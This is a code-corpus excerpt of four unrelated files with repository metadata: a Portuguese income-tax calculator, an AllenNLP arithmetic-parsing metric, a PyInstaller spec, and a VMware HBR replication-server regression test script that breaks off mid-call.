salario = float(input()) if salario > 0 and salario <= 2000: print('Isento') elif salario >= 2000.01 and salario <= 3000: valor1 = salario - 2000 imposto1 = (valor1 * 0.08) print('R$ %.2f' %imposto1) elif salario > 3000.01 and salario <= 4500: valor2 = salario - 2000 taxa2 = valor2 - 1000 imposto2 = (1000 * 0.08) + (taxa2 * 0.18) print('R$ %.2f' %imposto2) else: valor3 = salario - 2000 taxa3 = valor3 - 1000 excedente3 = taxa3 - 1500 imposto3 = (1000 * 0.08) + (1500 * 0.18) + (excedente3 * 0.28) print('R$ %.2f' %imposto3)
[ "kelsouto@gmail.com" ]
kelsouto@gmail.com
61c3dafe64239e02d32667643e92009192305061
773c9aa9520cba754de78a487c3f6a5994480231
/nla_semparse/nla_semparse/nla_metric.py
6dc60591b7a667ab61dca257f9a7a9c600ad0b3a
[ "MIT" ]
permissive
duanzhihua/allennlp-guide
a9ba1b012b2681fc8edef23c06d068b3f7a0e819
8bd90d1764ad6310145114fcaed48ea9ab986f4a
refs/heads/master
2023-08-21T23:58:41.577048
2021-10-22T22:26:52
2021-10-22T22:26:52
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,051
py
from typing import Dict, List, Optional from overrides import overrides from allennlp.training.metrics.metric import Metric from allennlp_semparse.domain_languages.domain_language import ExecutionError from .nla_language import NlaLanguage @Metric.register("nla_metric") class NlaMetric(Metric): """ Metric for evaluating prefix arithmetic sequences against targets, useful for Natural Language Arithmetic parsing. This metric evaluates predicted sequences on three things: 1) whether the predicted metric is a well-formed prefix arithmetic expression, 2) whether the predicted sequence and the target seqquence evaluate to the same value, 3) whether the predicted sequence and the target sequence are identical. """ def __init__(self): self._language = NlaLanguage() self._num_well_formed = 0 self._num_correct_denotation = 0 self._num_same_sequence = 0 self._num_all_sequences = 0 @overrides def __call__(self, predictions, targets) -> None: for prediction, target in zip(predictions, targets): if isinstance(prediction, list): prediction = " ".join(prediction).replace("( ", "(").replace(" )", ")") target = " ".join(target).replace("( ", "(").replace(" )", ")") if isinstance(prediction, str) and not prediction.startswith("("): prediction = f"({prediction})" if isinstance(target, str) and not target.startswith("("): target = f"({target})" evaluated_prediction = None evaluated_target = None try: evaluated_target = self._language.execute(target) evaluated_prediction = self._language.execute(prediction) except (TypeError, ExecutionError, IndexError): pass if isinstance(evaluated_prediction, int): self._num_well_formed += 1 if evaluated_prediction == evaluated_target: self._num_correct_denotation += 1 if prediction == target: self._num_same_sequence += 1 self._num_all_sequences += 1 @overrides def get_metric(self, reset: bool = False) -> Dict[str, float]: if self._num_all_sequences == 0: metrics = { "well_formedness": 0.0, "denotation_accuracy": 0.0, "sequence_accuracy": 0.0, } else: metrics = { "well_formedness": self._num_well_formed / self._num_all_sequences, "denotation_accuracy": self._num_correct_denotation / self._num_all_sequences, "sequence_accuracy": self._num_same_sequence / self._num_all_sequences, } if reset: self.reset() return metrics @overrides def reset(self): self._num_well_formed = 0 self._num_same_sequence = 0 self._num_correct_denotation = 0 self._num_all_sequences = 0
[ "noreply@github.com" ]
duanzhihua.noreply@github.com
de56ab5f4911f618b84712042c2b719d95c06110
4fad219a13598dcb99dccc4651ddbc032f3ec2df
/randeom_park.spec
1f09d08bf4d6755fdd3eedb98a866130c1c7642f
[]
no_license
Feanor1992/random_park
0ecd1b01014a2471a9771305d962d0235b537fb0
86126a51a205c30aa92af51d1290d7178f4cc48f
refs/heads/main
2023-08-02T00:40:21.122526
2021-10-03T17:18:53
2021-10-03T17:18:53
406,098,121
0
0
null
null
null
null
UTF-8
Python
false
false
1,048
spec
# -*- mode: python ; coding: utf-8 -*- block_cipher = None a = Analysis(['randeom_park.py'], pathex=['F:\\Artem\\Data Science\\random_park'], binaries=[], datas=[], hiddenimports=[], hookspath=[], hooksconfig={}, runtime_hooks=[], excludes=[], win_no_prefer_redirects=False, win_private_assemblies=False, cipher=block_cipher, noarchive=False) pyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher) exe = EXE(pyz, a.scripts, a.binaries, a.zipfiles, a.datas, [], name='randeom_park', debug=False, bootloader_ignore_signals=False, strip=False, upx=True, upx_exclude=[], runtime_tmpdir=None, console=True, disable_windowed_traceback=False, target_arch=None, codesign_identity=None, entitlements_file=None )
[ "feanor1992@gmail.com" ]
feanor1992@gmail.com
50f67d2b8da211228e3524f48d533e48fb1471d2
bbec348efb79c6588a4cb6bb565c813fe3fe86ad
/pyVpx/tests/hbrServer.py
9c521e7a53bb553cdf059ed14d5ffd65b7efd55d
[]
no_license
free-Zen/pvc
2be60fdc0fd0345039219c802223f987fce3b113
8428a84481be319ae739dfbb87715f31810138d9
refs/heads/master
2022-02-24T12:13:31.599398
2019-10-14T07:49:13
2019-10-14T07:49:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
48,195
py
#!/usr/bin/python # # hbrServer.py # # Simple regression tests for the HBR server # # XXX Rename hbrsrvTestAlone.py? XXX something better than that? # # # To Use this script: # # (1) You must build the "vmodl-hbr-py-build" target. # (2) Use the vim/py/py.sh wrapper script to run this: # bora/vim/py/py.sh bora/vim/py/tests/hbrServer.py # # # Generated python wrappers for the Hbr.Replica VMODL (used by hbrsrv) # are in: # build/build/vmodl/obj/generic/pyVmomi/HbrReplicaTypes.py # # # TODO: # - run different tests from command line to make failure isolation easier # from __future__ import print_function import sys import random import traceback import atexit import os import tempfile import re import commands import time import httplib import copy from pyVmomi import Hbr from pyVmomi import Vmodl # XXX for exceptions #import pyVim from pyVim.helpers import Log from pyVim import arguments import pyHbr.servercnx import pyHbr.disks # XXX ugly, but a side-effect of having factored these routines out of # here originally from pmtest import TestFunc, TestFailedExc, ExpectCond, \ ExpectedException, ExpectException, ExpectNoException, \ ExpectNotImplemented, ExpectNotFound, ExpectManagedObjectNotFound, \ RunCommand def CreateRandomId(prefix): return "%s-%u" % (prefix, random.randrange(0,1000*1000*1000)) def CreateRandomReplicaDiskPath(): """ Random relative path to a replica disk. (No datastore component.) """ global testdir vmdkName = CreateRandomId("hbrServer-disk") + ".vmdk" return os.path.join(testdir, vmdkName) def CreateRandomVMPath(): """ Random relative path to a vm replica. (No datastore component.) """ global testdir vmdirName = CreateRandomId("vmcfg") return os.path.join(testdir, vmdirName) allDisks = dict() def CreateDisk(diskName, datastoreMgr): global defaultDsMgr global allDisks if (datastoreMgr == None): datastoreMgr = defaultDsMgr # only create a new disk if its really needed if not diskName in allDisks: datastoreMgr.CreateDisk(diskName) atexit.register(datastoreMgr.DeleteDisk, diskName) allDisks[diskName] = 0 # ref count uses of disk allDisks[diskName] = allDisks[diskName] + 1 def CleanupDisk(diskName): global defaultDsMgr global allDisks if diskName in allDisks: allDisks[diskName] = allDisks[diskName] - 1 if allDisks[diskName] == 0: defaultDsMgr.DeleteDisk(diskName) del allDisks[diskName] def CreateDiskSpec(diskName, diskRDID, datastoreMgr): global defaultDsMgr if (datastoreMgr == None): datastoreMgr = defaultDsMgr vmfsPath = datastoreMgr.VMFSPath(diskName) # Create the diskIdent for the random location diskIdent = Hbr.Replica.IdentSpec() diskIdent.id = diskRDID diskIdent.datastoreUUID = datastoreMgr.DatastoreUUID() diskIdent.pathname = diskName + ".vmdk" # Actually create a disk: CreateDisk(vmfsPath, datastoreMgr) # Make a disk spec: disk = Hbr.Replica.DiskSpec() disk.diskIdent = diskIdent return disk def CreateRandomizedDiskSpec(datastoreMgr): """ Create a randomish disk spec for attaching to a group spec. Disk id is a random ID with the 'disk-id' prefix, """ global defaultDsMgr if (datastoreMgr == None): datastoreMgr = defaultDsMgr diskName = CreateRandomReplicaDiskPath() diskRDID = CreateRandomId("disk-id") # Create disk with random name and ID: return CreateDiskSpec(diskName, diskRDID, datastoreMgr) def CreateRandomizedVMIdent(datastoreMgr, vmID=None): global defaultDsMgr if (datastoreMgr == None): datastoreMgr = defaultDsMgr if vmID is None: vmID = CreateRandomId("random-vm-id") # Random VM config directory location: vmPath = CreateRandomVMPath() vmfsPath = datastoreMgr.VMFSPath(vmPath) # Make the VM directory. Needed by unconfigure tests, at least datastoreMgr.MakeDirectory(vmfsPath); # Fill out identity with vmID and location: vmIdent = Hbr.Replica.IdentSpec() vmIdent.id = vmID vmIdent.datastoreUUID = datastoreMgr.DatastoreUUID() vmIdent.pathname = vmPath return vmIdent def CreateRandomizedVMSpec(datastoreMgr, vmID=None, diskCt=None): # Random number of disks attached to a random vm: diskCt = diskCt or random.randrange(0,6) # Random VM spec with random number of disks: vm = Hbr.Replica.VirtualMachineSpec() vm.virtualMachineIdent = CreateRandomizedVMIdent(datastoreMgr, vmID) vm.replicatedDisks = [ CreateRandomizedDiskSpec(datastoreMgr) for x in xrange(diskCt) ] return vm def AddTierToRetentionPolicy(retentionPolicy, granularityMins, numSlots): newPolicy = retentionPolicy tier = Hbr.Replica.RetentionPolicy.Tier() tier.SetGranularityMinutes(int(granularityMins)) tier.SetNumSlots(int(numSlots)) if not newPolicy: newPolicy = Hbr.Replica.RetentionPolicy() if not newPolicy.tiers: newPolicy.tiers = []; newPolicy.tiers.append(tier) return newPolicy def RetentionPolicyToString(retentionPolicy): policyString = "" if retentionPolicy != None and retentionPolicy.tiers != None: for tier in retentionPolicy.tiers: tier = str(tier.GetGranularityMinutes()) + "," + str(tier.GetNumSlots()) policyString = policyString + "(" + tier + ")" return policyString def CreateRandomizedGroupSpec(groupID=None, rpo=None, datastoreMgr=None, retentionPolicy=None): if groupID is None: groupID = CreateRandomId("random-group-id") # Create one random VM spec: vm = CreateRandomizedVMSpec(datastoreMgr,vmID=groupID) # Put the VM spec in a simple random group spec: gspec = Hbr.Replica.GroupSpec() gspec.id = groupID gspec.rpo = rpo or random.randrange(1, 24*60) gspec.vms = [ vm, ] gspec.retentionPolicy = retentionPolicy or AddTierToRetentionPolicy( None, random.randrange(gspec.rpo, 24*60), random.randrange(1, 24)) return gspec def CreateInvalidGroupSpec(groupID, disks, datastoreMgr=None): Log("Spec '" +groupID+ "' w/disks: " +str(disks)) # Make a VM spec with the virtual disks specified in *disks vm = Hbr.Replica.VirtualMachineSpec() vm.virtualMachineIdent = CreateRandomizedVMIdent(datastoreMgr, vmID=groupID) vm.replicatedDisks = [ ] # Convert variable number of name/rdid pairs into disk specs: for rdid, name in disks: disk = CreateDiskSpec(name, rdid, datastoreMgr) vm.replicatedDisks.append(disk) # Make a simple group spec with the above VM in it gspec = Hbr.Replica.GroupSpec() gspec.id = groupID gspec.rpo = random.randrange(10, 100) gspec.vms = [ vm, ] gspec.retentionPolicy = AddTierToRetentionPolicy( None, random.randrange(gspec.rpo, 24*60), random.randrange(1, 24)) return gspec def CreateHostSpec(addr, auth): spec = Hbr.Replica.HostSpec() spec.hostId = addr; spec.hostAddresses = [addr]; spec.hostAuth = auth; return spec def PrintDatastores(dsList): if (len(dsList) == 0): print("Datastore list is empty..") return print("Printing datastore list...") for ds in dsList: print("\tDatastore: %s\tAccessible: %s" % (ds.uuid, ds.accessible)) return ### ### Tests ### @TestFunc def TestCreateGroup(count, repManager): """Test ReplicationManager CreateGroup method.""" # Create 'count' random (valid) groups. for x in xrange(0, count): gspec = CreateRandomizedGroupSpec() Log("Created spec: " +str(gspec)) g = ExpectNoException(repManager.CreateGroup, gspec) Log("Got group: " +str(g)) # check idempotency g2 = ExpectNoException(repManager.CreateGroup, gspec) if g._moId != g2._moId: raise TestFailedExc("Group returned to duplicate CreateGroup call '" + str(g2)+ "' is not equivalent to existing '" + str(g)+ "'.") Log("Valid group create tests complete.") # Create a valid spec (with at least one valid disk). To use for # causing duplicate-disk errors. while True: # Retry until we get at least one valid disk validSpec = CreateRandomizedGroupSpec() if len(validSpec.vms[0].replicatedDisks) != 0: break validDiskID = validSpec.vms[0].replicatedDisks[0].diskIdent.id invalidGroups = ( (Hbr.Replica.Fault.InvalidGroupSpec, "groupid-same disk twice", (("gr1-disk1", "valid-disk-1"), ("gr1-disk1", "valid-disk-1") ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "groupid-same diskid twice", (("gr2-disk1", "valid-disk-1"), ("gr2-disk1", "valid-disk-2") ) ), (Hbr.Replica.Fault.HbrDiskAlreadyExists, "groupid-reused diskid", (("gr3-disk1", "valid-disk-1"), (validDiskID, "valid-disk-2") ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "group-with-a-too-long-invalid-group-id-that-should-not-be-accepted-ever-no-matter-what-no-matter-how-superb-hbrsrv-ever-becomes", (("gr4-disk-1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidHbrDiskSpec, "groupid-too long diskid", (("disk-with-a-too-long-invalid-disk-id-that-should-not-be-accepted-ever-no-matter-what-no-matter-how-superb-hbrsrv-ever-becomes", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "id-invalid-period.", (("gr1-d1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "id-invalid-bang!", (("gr1-d1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "id-invalid-hash#", (("gr1-d1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "id-invalid-quote'", (("gr1-d1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "id-invalid-dblquote\"", (("gr1-d1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "id-invalid-nl\n", (("gr1-d1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "id-invalid-tab\t", (("gr1-d1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "id-invalid-dollar$", (("gr1-d1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "$#!@_&$**()", (("gr1-d1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidGroupSpec, "", (("gr1-d1", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidHbrDiskSpec, "valid-gr1", (( "gr1-d1-invalid-period.", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidHbrDiskSpec, "valid-gr1", (( "", "valid-disk-1"), ) ), (Hbr.Replica.Fault.InvalidHbrDiskSpec, "valid-gr1", (( "_@$#!$**&&", "valid-disk-1"), ) ), ) # Create the valid group for 'groupid-reused diskid' to conflict with g = ExpectNoException(repManager.CreateGroup, validSpec) Log("Got 'valid' group (for reused id test): " +str(g)) for fault, groupID, disks in invalidGroups: Log("Creating group with invalid ID(s): " +str(groupID)) invalGr = CreateInvalidGroupSpec(groupID, disks) ExpectException(fault, repManager.CreateGroup, invalGr) Log("Try with mismatch between 'group' and 'vm' ids:") invalGr = CreateInvalidGroupSpec("group-id-different-from-vm", (("gr1-d1", "valid-disk-1"), )) invalGr.id = "group-id-VERY-DIFFERENT-from-vm" ExpectException(Hbr.Replica.Fault.InvalidVirtualMachineSpec, repManager.CreateGroup, invalGr) Log("Try with invalid vm datastore configuration:") baseSpec = CreateRandomizedGroupSpec() for ds in ("invalid/datastore", "/", "/invalid", "invalid/"): Log("Setting datastore to: '%s'" % ds) baseSpec.vms[0].virtualMachineIdent.datastoreUUID = ds ExpectException(Hbr.Replica.Fault.InvalidVirtualMachineSpec, repManager.CreateGroup, baseSpec) # Test that we don't accidentally allow duplicate calls when the spec changes Log("Negative idempotency tests"); gspec = CreateRandomizedGroupSpec() g = ExpectNoException(repManager.CreateGroup, gspec) g2 = ExpectNoException(repManager.CreateGroup, gspec) if g._moId != g2._moId: raise TestFailedExc("Group returned to duplicate CreateGroup call '" + str(g2)+ "' is not equivalent to existing '" + str(g)+ "'.") # Test with completely different spec gspec2 = CreateRandomizedGroupSpec() gspec2.id = gspec.id gspec2.vms[0].virtualMachineIdent.id = gspec.id ExpectException(Hbr.Replica.Fault.GroupAlreadyExists, repManager.CreateGroup, gspec2) # Test with slightly different specs gpsec2 = copy.deepcopy(gspec) gspec2.rpo = gspec2.rpo + 1; ExpectException(Hbr.Replica.Fault.GroupAlreadyExists, repManager.CreateGroup, gspec2) # Test with different VM spec gpsec2 = copy.deepcopy(gspec) gspec2.vms = [ CreateRandomizedVMSpec(None, vmID=gspec.id) ] ExpectException(Hbr.Replica.Fault.GroupAlreadyExists, repManager.CreateGroup, gspec2) # Test with different disks gpsec2 = copy.deepcopy(gspec) gspec2.vms[0].replicatedDisks.append(CreateRandomizedDiskSpec(None)) ExpectException(Hbr.Replica.Fault.GroupAlreadyExists, repManager.CreateGroup, gspec2) Log("All invalid group create tests complete.") @TestFunc def TestGetInvalidGroup(repManager): """Test ReplicationManager.GetGroup with invalid group.""" ExpectException(Hbr.Replica.Fault.GroupNotFound, repManager.GetGroup, "invalid-group-id") @TestFunc def TestGetValidGroup(repManager): """Test ReplicationManager.GetGroup with a valid group.""" validID = CreateRandomId("valid-group") gspec = CreateRandomizedGroupSpec(groupID=validID) newGroup = ExpectNoException(repManager.CreateGroup, gspec) fetchGroup = ExpectNoException(repManager.GetGroup, validID) if fetchGroup._moId != newGroup._moId: raise TestFailedExc("New group '" +str(newGroup)+ "' is not " "equivalent to fetched '" +str(fetchGroup)+ "'.") Log("Created and looked up '" +str(newGroup)+ "'.") @TestFunc def TestGetGroup(repManager): """Test ReplicationManager GetGroup method.""" TestGetInvalidGroup(repManager) TestGetValidGroup(repManager) @TestFunc def TestGetGroups(repManager): # This test needs to run when there are no groups in the server (i.e. before # other tests) """Test ReplicationManager groups property.""" # Check that we get no groups initially groups = repManager.groups if len(groups) != 0: raise TestFailedExc("Expected no groups, server reported " + str(groups)) # Add a group, check that we get it group1Id = CreateRandomId("getgroups1") group1Spec = CreateRandomizedGroupSpec(groupID=group1Id) group1 = ExpectNoException(repManager.CreateGroup, group1Spec); groups = repManager.groups if (len(groups) != 1) or (group1._moId != groups[0]._moId): raise TestFailedExc("Expected 1 group " + str(group1) + " received " + str(groups)) # Add another group, check that we get both group2Id = CreateRandomId("getgroups2") group2Spec = CreateRandomizedGroupSpec(groupID=group2Id) group2 = ExpectNoException(repManager.CreateGroup, group2Spec); groups = repManager.groups if len(groups) != 2 or not \ (((group1._moId == groups[0]._moId) and \ (group2._moId == groups[1]._moId)) \ or ((group1._moId == groups[1]._moId) and \ (group2._moId == groups[0]._moId))): raise TestFailedExc("Expected 2 groups " + str(group1) + " and " + str(group2) + " but received " + str(groups)) # Remove both groups, check that again we get no groups ExpectNoException(group1.Remove) ExpectNoException(group2.Remove) groups = repManager.groups if len(groups) != 0: raise TestFailedExc("Expected no groups, server reported " + str(groups)) @TestFunc def TestAddGroupErrorCleanup(repManager): """Test ReplicationManager cleanup on error in AddGroup""" global defaultDsMgr gspec1 = CreateRandomizedGroupSpec() gspec2 = CreateRandomizedGroupSpec() # Create a bogus disk disk = Hbr.Replica.DiskSpec() disk.diskIdent = Hbr.Replica.IdentSpec() disk.diskIdent.id = CreateRandomId("disk-id") disk.diskIdent.datastoreUUID = defaultDsMgr.DatastoreUUID() disk.diskIdent.pathname = "bogus/path/baby.vmdk" # Add disk to both groups gspec1.vms[0].replicatedDisks.append(disk) gspec2.vms[0].replicatedDisks.append(disk) Log("Adding group 1 with bogus disk"); group1 = ExpectNoException(repManager.CreateGroup, gspec1); Log("Trying to add group 2 with same bogus disk"); ExpectException(Hbr.Replica.Fault.HbrDiskAlreadyExists, repManager.CreateGroup, gspec2) # Add it again, shouldn't matter ExpectException(Hbr.Replica.Fault.HbrDiskAlreadyExists, repManager.CreateGroup, gspec2) Log("Removing group 1"); ExpectNoException(group1.Remove); Log("Adding group 2"); group2 = ExpectNoException(repManager.CreateGroup, gspec2); Log("Removing group 2") ExpectNoException(group2.Remove) @TestFunc def TestRemoveGroup(repManager): """Test Group Remove method""" gspec = CreateRandomizedGroupSpec() newGroup = ExpectNoException(repManager.CreateGroup, gspec) Log("Created valid group " +str(newGroup)+ ". Will delete it now.") ExpectNoException(newGroup.Remove) Log("Deleted group " +str(newGroup)+ ". Will delete it again.") ExpectManagedObjectNotFound(newGroup.Remove) Log("Re-add group " +str(gspec)+ ".") ExpectNoException(repManager.CreateGroup, gspec) @TestFunc def TestUnconfigureGroup(repManager): """Test Group Unconfigure method""" # Create the group gspec = CreateRandomizedGroupSpec() newGroup = ExpectNoException(repManager.CreateGroup, gspec) # Unconfigure the group Log("Created valid group " +str(newGroup)+ ". Will unconfigure it now.") ExpectNoException(newGroup.Unconfigure) Log("Unconfigured group " +str(newGroup)+ ". Will unconfigure it again (error).") ExpectManagedObjectNotFound(newGroup.Unconfigure) Log("Re-add group " +str(gspec)+ ".") ExpectNoException(repManager.CreateGroup, gspec) @TestFunc def TestRecoverGroup(repManager): """Test Group Recover method""" # Create the group gspec = CreateRandomizedGroupSpec() newGroup = ExpectNoException(repManager.CreateGroup, gspec) # Unconfigure the group Log("Created valid group " +str(newGroup)+ ". Will unconfigure it now.") ExpectNoException(newGroup.Unconfigure) # Recover the group (equivalent to createGroup for now) Log("Recover unconfigured group " +str(newGroup)+ ". Will delete it again.") ExpectManagedObjectNotFound(newGroup.Unconfigure) Log("Re-add group " +str(gspec)+ ".") ExpectNoException(repManager.CreateGroup, gspec) @TestFunc def TestAddRemoveDisk(repManager): """Test ReplicationManager RemoveGroup method""" groupID = CreateRandomId("addrm-group-id") disk1Spec = CreateRandomizedDiskSpec(datastoreMgr=None) disk2Spec = CreateRandomizedDiskSpec(datastoreMgr=None) disk3Spec = CreateRandomizedDiskSpec(datastoreMgr=None) vmSpec = Hbr.Replica.VirtualMachineSpec() vmSpec.virtualMachineIdent = CreateRandomizedVMIdent(datastoreMgr=None, vmID=groupID) vmSpec.replicatedDisks = [ disk1Spec ] gSpec = Hbr.Replica.GroupSpec() gSpec.id = groupID gSpec.rpo = 13 gSpec.vms = [ vmSpec ] Log("Creating group") g = ExpectNoException(repManager.CreateGroup, gSpec) vms = g.GetVms() ExpectCond(len(vms) == 1, "Group should contain 1 VM") vm = vms[0] Log("Adding disk 2") d2 = ExpectNoException(vm.AddDisk, disk2Spec) ExpectException(Hbr.Replica.Fault.HbrDiskAlreadyExists, vm.AddDisk, disk2Spec) ExpectCond(not d2.unconfigured, "Disk is unconfigured after add!") ExpectException(Hbr.Replica.Fault.HbrDiskNotUnconfigured, vm.RemoveDisk, d2) ExpectCond(not d2.unconfigured, "Disk became unconfigured!") ExpectNoException(vm.UnconfigureDisk, d2) ExpectCond(d2.unconfigured, "Disk is not unconfigured after unconfigure!") ExpectNoException(vm.UnconfigureDisk, d2) ExpectCond(d2.unconfigured, "Disk became configured!") ExpectNoException(vm.RemoveDisk, d2) ExpectManagedObjectNotFound(vm.RemoveDisk, d2) Log("Removing disk 1") d1 = ExpectNoException(vm.GetDisk, disk1Spec.diskIdent.id) ExpectCond(not d1.unconfigured, "Disk is already unconfigured!") ExpectException(Hbr.Replica.Fault.HbrDiskNotUnconfigured, vm.RemoveDisk, d1) ExpectCond(not d1.unconfigured, "Disk became configured!") ExpectNoException(vm.UnconfigureDisk, d1) ExpectCond(d1.unconfigured, "Disk is not unconfigured after unconfigure!") ExpectNoException(vm.RemoveDisk, d1) Log("Adding all disks and removing") d1 = ExpectNoException(vm.AddDisk, disk1Spec) d2 = ExpectNoException(vm.AddDisk, disk2Spec) d3 = ExpectNoException(vm.AddDisk, disk3Spec) ExpectNoException(vm.UnconfigureDisk, d1) ExpectNoException(vm.UnconfigureDisk, d2) ExpectNoException(vm.RemoveDisk, d2) ExpectNoException(vm.UnconfigureDisk, d3) ExpectNoException(vm.RemoveDisk, d1) ExpectNoException(vm.RemoveDisk, d3) ExpectNoException(g.Remove) @TestFunc def TestGroupVMs(gspec, group): # Note that 'vms' is a property, not a method Log("Test .vms property"); vms = group.vms if len(vms) != 1: raise TestFailedExc("Groups should only contain 1 VM!") Log("Got vm " +str(vms[0])) # GetVirtualMachineIdent # GetDisks # ChangeConfigLocation @TestFunc def TestReplicaGroup(repManager): rpo=42 retentionPolicy = AddTierToRetentionPolicy(None, 60, 4) gspec = CreateRandomizedGroupSpec(rpo=rpo, retentionPolicy=retentionPolicy) group = ExpectNoException(repManager.CreateGroup, gspec) Log("Created group for testing ReplicaGroup API: " +str(group)) TestGroupVMs(gspec, group) Log("Test GetRpo"); returnRpo = group.GetRpo() if returnRpo != rpo: raise TestFailedExc("RPO should be " + str(rpo) + ", not " + str(returnRpo)); Log("Test UpdateRpo (valid RPO values)"); for nRpo in [ 0, 1, 11, 13, 99, 100, 1000, 1440 ]: ExpectNoException(group.UpdateRpo, nRpo) returnRpo = group.GetRpo() if returnRpo != nRpo: raise TestFailedExc("RPO should be " + str(nRpo) + ", not " + str(returnRpo)); Log("Test UpdateRpo (invalid RPO values)"); invalRpoFault = Vmodl.Fault.InvalidArgument for nRpo in [ -1000, -1, 1441, 100*1000*1000 ]: ExpectException(invalRpoFault, group.UpdateRpo, nRpo) Log("Test GetRetentionPolicy"); returnPolicy = group.GetRetentionPolicy() if RetentionPolicyToString(returnPolicy) != RetentionPolicyToString(retentionPolicy): raise TestFailedExc("Retention policy should be " + RetentionPolicyToString(retentionPolicy) + ", not " + RetentionPolicyToString(returnPolicy)); Log("Test UpdateRetentionPolicy (valid retention policy values)"); testPolicy = AddTierToRetentionPolicy(None, 0, 8) testPolicy = AddTierToRetentionPolicy(testPolicy, 5, 14) testPolicy = AddTierToRetentionPolicy(testPolicy, 15, 3) testPolicy = AddTierToRetentionPolicy(testPolicy, 45, 16) testPolicy = AddTierToRetentionPolicy(testPolicy, 120, 8) testPolicy = AddTierToRetentionPolicy(testPolicy, 360, 10) testPolicy = AddTierToRetentionPolicy(testPolicy, 1140, 2) totalSlots = 0 retentionPolicy = None for tier in testPolicy.tiers: if totalSlots + tier.GetNumSlots() > 24: totalSlots = 0 retentionPolicy = None retentionPolicy = AddTierToRetentionPolicy(retentionPolicy, tier.GetGranularityMinutes(), tier.GetNumSlots()) totalSlots += tier.GetNumSlots() ExpectNoException(group.UpdateRetentionPolicy, retentionPolicy) returnPolicy = group.GetRetentionPolicy() if RetentionPolicyToString(returnPolicy) != RetentionPolicyToString(retentionPolicy): raise TestFailedExc("Retention policy should be " + RetentionPolicyToString(retentionPolicy) + ", not " + RetentionPolicyToString(returnPolicy)); Log("Test UpdateRetentionPolicy (invalid retention policy values)"); testPolicy = AddTierToRetentionPolicy(None, -1, 8) testPolicy = AddTierToRetentionPolicy(testPolicy, 0, -1) testPolicy = AddTierToRetentionPolicy(testPolicy, 15, 0) testPolicy = AddTierToRetentionPolicy(testPolicy, 45, 36) invalidPolicyFault = Vmodl.Fault.InvalidArgument for tier in testPolicy.tiers: retentionPolicy = AddTierToRetentionPolicy(None, tier.GetGranularityMinutes(), tier.GetNumSlots()) ExpectException(invalidPolicyFault, group.UpdateRetentionPolicy, retentionPolicy) # Test repeating the same granularity mins testPolicy = AddTierToRetentionPolicy(None, 5, 2) testPolicy = AddTierToRetentionPolicy(testPolicy, 10, 6) testPolicy = AddTierToRetentionPolicy(testPolicy, 10, 12) testPolicy = AddTierToRetentionPolicy(testPolicy, 20, 1) ExpectException(invalidPolicyFault, group.UpdateRetentionPolicy, testPolicy) # Test total number of slots greater than default max of 24 testPolicy = AddTierToRetentionPolicy(None, 3, 9) testPolicy = AddTierToRetentionPolicy(testPolicy, 19, 8) testPolicy = AddTierToRetentionPolicy(testPolicy, 43, 6) testPolicy = AddTierToRetentionPolicy(testPolicy, 111, 7) ExpectException(invalidPolicyFault, group.UpdateRetentionPolicy, testPolicy) Log("Test GetState"); st = group.GetState() if st != "passive": raise TestFailedExc("State should be 'passive'") else: Log("Group is 'passive'") Log("Test GetId"); ExpectNoException(group.GetId) Log("Test GetCurrentRpoViolation"); rpoViolation = group.GetCurrentRpoViolation() if (rpoViolation != -1): raise TestFailedExc("Rpo violation should initially be -1, not " + str(rpoViolation)); # group.Remove tested elsewhere # Can't test CommitToImage without an image ... #Log("Test CommitToImage"); #ExpectNotImplemented(group.CommitToImage, None) # Note that .Instances is a property, not a method Log("Test .instances property"); insts = group.instances if len(insts) > 0: raise TestFailedExc("Groups should contain 0 instances!") else: Log("No instances.") # Note: that .latestInstance is a property, not a method inst = group.latestInstance Log("Got .latestInstance " +str(inst)) if inst: raise TestFailedExc("Group should not have a 'latest' instance!") else: Log("No latest instance.") @TestFunc def TestHosts(repManager, datastoreConf): storageManager = repManager.GetStorageManager() # unpack the legitimate datastore configuration (host, user, password) = datastoreConf randHost = CreateRandomId("host-") randUser1 = CreateRandomId("user-") randUser2 = CreateRandomId("user1-") randPass = CreateRandomId("pass-") Log("Test EnableHost") # Test adding a new host hspec = CreateHostSpec(randHost, randUser1 + ":" + randPass) newHost1 = ExpectNoException(storageManager.EnableHost, hspec) print("Added host %s" % newHost1.GetId) # Test modifying the user of existing host hspec = CreateHostSpec(randHost, randUser2 + ":" + randPass) newHost2 = ExpectNoException(storageManager.EnableHost, hspec) # Test modifying password of existing host hspec = CreateHostSpec(randHost, randUser2 + ":") newHost2 = ExpectNoException(storageManager.EnableHost, hspec) # Since EnableHost is idempotent, get a reference to existing valid host hspec = CreateHostSpec(host, user + ":" + password) validHost = ExpectNoException(storageManager.EnableHost, hspec) # Test removing the host Log("Test removing hosts...") ExpectNoException(newHost1.Remove) ExpectNoException(validHost.Remove) # There should be no valid hosts existing and hence all configured # datastores should be marked inaccessible. dsList = storageManager.GetExpectedDatastores() for ds in dsList: if (ds.accessible): PrintDatastores(dsList) raise TestFailedExc("Removing all hosts should mark all datastores inaccessible") Log("Test EnableHost with null configurations") # Try with .. # .. invalid host name ExpectException(Hbr.Replica.Fault.InvalidHostSpec, storageManager.EnableHost, CreateHostSpec("", randUser1+":"+randPass)) # .. invalid user/pass ExpectException(Hbr.Replica.Fault.InvalidHostSpec, storageManager.EnableHost, CreateHostSpec("valid", ":")) ExpectException(Hbr.Replica.Fault.InvalidHostSpec, storageManager.EnableHost, 